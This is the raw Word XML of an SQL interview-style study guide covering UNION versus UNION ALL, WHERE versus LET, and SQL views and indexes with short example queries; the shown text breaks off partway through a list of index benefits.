          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450CBD3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y default, UNION removes duplicate rows from the final result set. If you want to include duplicates, you can use UNION ALL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C44E5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rder of Rows</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FF0CA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The result set will not necessarily be ordered unless you use an ORDER BY clause after the last SELECT statement in the union.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5895CF8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646DB2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752966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6661A7F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4B759C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A0D37C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8223F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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FD8D4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E21916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8D396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Let’s say we have two tables, </w:t>
      </w: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both with the same structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284CF86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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE2A7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contractor_id, contractor_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3153789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e want to combine the names of employees and contractors into a single list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A451C7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7862714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3A16FE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34F2ED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all unique names from both the employees and contractors tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC5997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NION ALL Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9C76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you want to include duplicate names (i.e., when a name appears in both tables), you can use </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8DBA2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1B2C2A4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 ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E24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EBD867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 Between UNION and UNION ALL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DBDEB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removes duplicate rows from the result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FCE74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 xml:space="preserve"> includes all rows, even duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194086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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6EE7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results from multiple tables</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you want to get similar data from different sources and combine them, UNION can help.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A70023" w14:textId="77777777" w:rsidR="00AF73EB" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF73EB" w:rsidP="00AF73EB">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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Data consolidation</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to consolidate data with similar structure into a single result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5DB7B9" w14:textId="7D28D220"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3227" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF9E4A" w14:textId="296532D6" w:rsidR="001D73F8" w:rsidRPr="00CE4B95" w:rsidRDefault="006C32BA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="770" w:name="_Toc197867984"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we perform union operations on one table</w:t>
      </w:r>
      <w:r w:rsidR="001D73F8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="770"/>
    </w:p>
    <w:p w14:paraId="172C78B9" w14:textId="532A8F58"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Yes, you can perform a </w:t>
      </w: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NION on a Single Table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097A071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say you have a table named employees with the following structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296DC6D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 department_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7371A0E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perform a UNION to combine different SELECT queries on the same table, like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6937DC9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1F15AEA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1DDAC9F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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82B5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is query will return a combined list of employee names who belong to </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>department 1</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department 2</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, without duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6CDB1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Why would you use UNION on one table?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1D91C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ultiple Filter Conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to retrieve data from a single table but apply different filter conditions (like different departments in the example above).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026DDD9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Different Columns</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You might want to combine different columns or computed data based on different conditions (e.g., fetching active employees in one query and inactive ones in another).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDA34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ing Various Views of the Same Data</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When querying a table from different perspectives (e.g., managers in one query, regular employees in another) and then combining the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D148CD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 Selecting Different Columns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686D01E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38EEF2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41D175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employee_id FROM employees WHERE department_id = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89CC1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columns in both SELECT queries need to be of compatible types (e.g., both employee_name and employee_id should be of the same type, like VARCHAR or INT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10686348"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0FB5867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ame Number of Columns</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The SELECT statements used in a UNION operation must return the same number of columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F45DB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Type Compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The data types of corresponding columns in each SELECT query must be compatible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD2C0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s Removed by Default</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: UNION removes duplicate rows from the final result. If you want to keep duplicates, use UNION ALL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324FA30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o, while performing UNION on a single table, it's about combining results from different queries that operate on that table, usually with different conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B697E5" w14:textId="1A22F356"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3228" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F98587A" w14:textId="1A743BC3" w:rsidR="001D73F8" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6323">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="771" w:name="_Toc197867985"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="007F49A7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between where and let</w:t>
      </w:r>
      <w:r w:rsidR="001D73F8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="771"/>
    </w:p>
    <w:p w14:paraId="55A4DD7F" w14:textId="574CC4BB" w:rsidR="00AF73EB" w:rsidRPr="0085313D" w:rsidRDefault="00AF73EB"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ifference between WHERE and LET is context-dependent, as they are used in different situations. Here’s an explanation for each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D2331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WHERE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFDFC8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Primarily used in SQL (Structured Query Language) and in some programming languages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCD895B"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t is a conditional clause used to filter records based on specific criteria in SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041B386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r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In SQL, WHERE is used to filter rows that meet the specified condition(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234ED6A7"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QL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228D905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s WHERE department_id = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE76B5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select all records from the employees table where the department_id is 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680DCD9B"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ther uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7495AD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w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LINQ</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Language Integrated Query) in programming languages like C#, WHERE is used to filter collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A041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ar result = employees.Where(e =&gt; e.DepartmentId == 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BBC63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T:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAF057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xml:space="preserve">: Typically used in programming languages like JavaScript, Python, or functional programming, and in certain query languages like </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SPARQL</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ypher</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for graph databases like Neo4j).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6872756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JavaScript:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A73A30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 x = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214283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ole.log(x);  // Output: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC7797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LET declares a block-scoped variable x and assigns it a value of 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728C69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PARQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB2A3B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name WHERE {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533EC3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person a ex:Person .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D345B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ET ?name = ?person</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292603D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FILTER (?name = "John")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E868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552BDC0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re, LET is used to assign the value of ?person to a variable ?name for use in the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA5FE53"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p w14:paraId="111A659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is used in filtering data or records based on conditions in SQL, programming queries, and LINQ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB7DE2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37D128C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filters records based on conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E16E45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used to assign values to variables or define intermediate bindings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF60997" w14:textId="4B31A97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3229" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3249C858" w14:textId="51635D55"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72" w:name="_Toc197867986"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is View and Index in SQL?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="772"/>
    </w:p>
    <w:p w14:paraId="5A5E9F00" w14:textId="4E195AE6" w:rsidR="002E6CA2" w:rsidRPr="0085313D" w:rsidRDefault="002E6CA2"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 in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06B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View</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Views:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3209EF1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Virtual Table</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A view acts like a table in SQL but does not actually store data. Instead, it stores a query that is executed when you query the view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42263AB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implification</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Views are often used to simplify complex queries, especially when the same query is repeatedly used in multiple places.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA6835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Views can be used to restrict access to certain columns or rows of a table, providing a way to control the visibility of sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420AC30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ad-Only/Updatable</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Depending on the complexity of the query, views can either be </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read-only</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updatable</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., if they are based on a single table with no aggregations or joins).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E7E1FE"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View:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D5A4F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view_name AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2578F5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9E2CD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_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412A114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5E602A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6401629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Employee_View AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242F25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employee_name, department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC23F0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F84D8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status = 'Active';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C2FC0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then query the view like a table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044C478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_View;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D61DB56"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Views:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2880C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 Query Simplification</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you need to join multiple tables frequently, you can create a view that encapsulates that join.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E0588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Hide sensitive information by providing access to only certain columns in a view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B1533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sistency</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Views ensure that a consistent result set is returned, particularly when you want to enforce specific filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D33256"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450556">
          <v:rect id="_x0000_i3230" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="453EEBA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in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E33A6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that improves the speed of data retrieval operations on a table at the cost of additional space and slower write operations (INSERT, UPDATE, DELETE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D44B8B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Indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106E436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Improvement</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Indexes improve the speed of data retrieval queries by allowing the database engine to find rows more quickly without scanning the entire table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711BBB5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and Non-Unique</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An index can be unique (ensuring no duplicate values in the indexed column(s)) or non-unique (allowing duplicates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF40B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ructure</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Indexes are usually implemented as </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>B-trees</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Balanced Trees) or </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hash indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These structures enable fast searching and retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289372C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r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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n Index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B49FC3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ndex_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505CAB2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 (column_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E0E3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2135BA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAFADB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA8517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n index idx_employee_name is created on the employee_name column of the employees table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4967F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Types of Indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5425671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Key Index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Automatically created when a primary key is defined. It ensures that the data is unique and allows fast searching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F17FD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Ensures that all values in the indexed column(s) are unique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C2B08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allowing for faster lookups on queries that filter by multiple columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FA04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indexing large text data for fast full-text searches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D84DE9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r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The data in the table is physically sorted based on the index. Each table can have only one clustered index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5BFE2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Example of Composite Index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D31F9F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department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614EF30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 department_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCE81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index will speed up queries that filter by both employee_name and department_id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094EC8E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Indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7E75E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mproving Query Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Indexes significantly speed up read operations (SELECT queries) by reducing the time needed to locate specific rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447ED26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and Foreign Key Constraints</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
